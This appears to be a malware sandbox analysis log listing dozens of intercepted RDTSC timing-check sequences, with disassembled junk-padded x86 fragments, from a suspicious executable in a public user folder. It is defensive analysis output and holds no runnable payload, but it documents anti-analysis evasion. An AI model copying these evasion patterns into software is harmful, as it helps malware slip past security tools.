                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125501B second address: 125502A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125502A second address: 1255030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1255030 second address: 1255061 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FCCB120DFEDh 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12555F7 second address: 12555FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12555FD second address: 1255625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FCCB120DFD6h 0x0000000a popad 0x0000000b jmp 00007FCCB120DFE5h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FCCB120DFD6h 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1255625 second address: 125562B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1255907 second address: 125591F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125A98D second address: 125A99B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125A99B second address: 125A99F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125A99F second address: 125A9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125A9AD second address: 125A9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12623E1 second address: 12623FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB0D02D08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCCB0D02D0Fh 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1262E12 second address: 1262E1C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB120DFD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1262E1C second address: 1262E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12630C9 second address: 12630EF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCCB120DFD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007FCCB120DFE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263220 second address: 1263224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263224 second address: 126323D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FCCB120DFD6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f js 00007FCCB120DFD6h 0x00000015 popad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 126323D second address: 1263279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 jo 00007FCCB0D02D0Ah 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 js 00007FCCB0D02D0Eh 0x00000017 pushad 0x00000018 jl 00007FCCB0D02D06h 0x0000001e jng 00007FCCB0D02D06h 0x00000024 jmp 00007FCCB0D02D0Bh 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263279 second address: 1263283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCCB120DFD6h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263A5D second address: 1263A62 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263A62 second address: 1263A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFE3h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCCB120DFDFh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263A91 second address: 1263A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263A97 second address: 1263A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263A9B second address: 1263AA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263AA1 second address: 1263AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263AA7 second address: 1263AAC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1264124 second address: 1264128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1279FEB second address: 127A000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D0Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 127A19B second address: 127A19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 127A19F second address: 127A1A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 127C9E9 second address: 127C9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 127C9ED second address: 127C9F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 127C9F1 second address: 127CA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007FCCB120DFD6h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 127CB55 second address: 127CB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1281C19 second address: 1281C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 128631D second address: 128632C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 128C6C4 second address: 128C6D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCCB120DFDEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 128C4C1 second address: 128C4CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 128C4CC second address: 128C4EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FCCB120DFD6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 128C4EB second address: 128C519 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FCCB0D02D21h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007FCCB0D02D19h 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 128C519 second address: 128C523 instructions: 0x00000000 rdtsc 0x00000002 js 00007FCCB120DFD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 128C523 second address: 128C529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 128C529 second address: 128C52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1294806 second address: 129481B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D10h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1293408 second address: 129340E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 129340E second address: 129341F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB0D02D06h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1293863 second address: 129386D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FCCB120DFD6h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12939E0 second address: 12939E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12944A1 second address: 12944A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12944A7 second address: 12944AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12A0485 second address: 12A049B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FCCB120DFDFh 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12A0355 second address: 12A0359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12BCEA4 second address: 12BCEBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCCB120DFDDh 0x00000009 jp 00007FCCB120DFD6h 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12BCEBB second address: 12BCEBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12BCEBF second address: 12BCEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FCCB120DFE8h 0x00000010 push esi 0x00000011 jmp 00007FCCB120DFDAh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12BD005 second address: 12BD00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12BD00B second address: 12BD012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D3DC5 second address: 12D3DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D4340 second address: 12D4371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCCB120DFD6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 pushad 0x00000011 jmp 00007FCCB120DFDFh 0x00000016 jne 00007FCCB120DFDCh 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D45FC second address: 12D4600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D4600 second address: 12D4606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D473B second address: 12D4757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCCB0D02D0Ch 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D4757 second address: 12D475B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D475B second address: 12D4763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D4763 second address: 12D476D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCCB120DFDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D4C26 second address: 12D4C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D4C2C second address: 12D4C47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE1h 0x00000007 je 00007FCCB120DFE2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D8EA1 second address: 12D8EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D8F51 second address: 12D8F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D8F56 second address: 12D8F71 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCCB0D02D0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007FCCB0D02D18h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D8F71 second address: 12D8F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D8F75 second address: 12D8F79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D91F9 second address: 12D91FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D91FF second address: 12D9272 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCCB0D02D0Ch 0x00000008 jc 00007FCCB0D02D06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 call 00007FCCB0D02D0Ah 0x00000018 mov dword ptr [ebp+1376B668h], ebx 0x0000001e pop edx 0x0000001f push 00000004h 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007FCCB0D02D08h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b mov edx, 4894D800h 0x00000040 mov edx, 45814DE9h 0x00000045 call 00007FCCB0D02D09h 0x0000004a jl 00007FCCB0D02D10h 0x00000050 jmp 00007FCCB0D02D0Ah 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D9272 second address: 12D9276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D9276 second address: 12D9280 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D9280 second address: 12D92CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edi 0x0000000e jmp 00007FCCB120DFDEh 0x00000013 pop edi 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FCCB120DFE8h 0x0000001f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D92CB second address: 12D92CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D92CF second address: 12D92D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12DAF65 second address: 12DAF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12DAF69 second address: 12DAF71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12DCB25 second address: 12DCB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1029288 second address: 102929F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCCB120DFD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jne 00007FCCB120DFD6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B332C second address: 11B334B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FCCB120DFD6h 0x00000011 jmp 00007FCCB120DFDEh 0x00000016 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B3497 second address: 11B34DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE6h 0x00000007 jmp 00007FCCB120DFE2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCCB120DFE5h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B34E1 second address: 11B3504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FCCB120DFD6h 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B3504 second address: 11B352D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FCCB0D02D0Eh 0x00000010 pushad 0x00000011 popad 0x00000012 jp 00007FCCB0D02D06h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FCCB0D02D0Fh 0x0000001f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B3AA6 second address: 11B3AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCCB0D02D06h 0x0000000a jmp 00007FCCB0D02D0Dh 0x0000000f jo 00007FCCB0D02D12h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B3ACB second address: 11B3AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007FCCB0D02D06h 0x0000000c jmp 00007FCCB0D02D10h 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B71C5 second address: 11B71F0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCCB120DFD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop esi 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 jmp 00007FCCB120DFE4h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B71F0 second address: 11B7255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FCCB0D02D06h 0x00000009 ja 00007FCCB0D02D06h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 jbe 00007FCCB0D02D16h 0x0000001c jmp 00007FCCB0D02D10h 0x00000021 pop eax 0x00000022 jmp 00007FCCB0D02D13h 0x00000027 lea ebx, dword ptr [ebp+138F1FBEh] 0x0000002d sub dword ptr [ebp+13763309h], edx 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FCCB0D02D16h 0x0000003b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B72DA second address: 11B7302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCCB120DFDEh 0x00000010 rdtsc
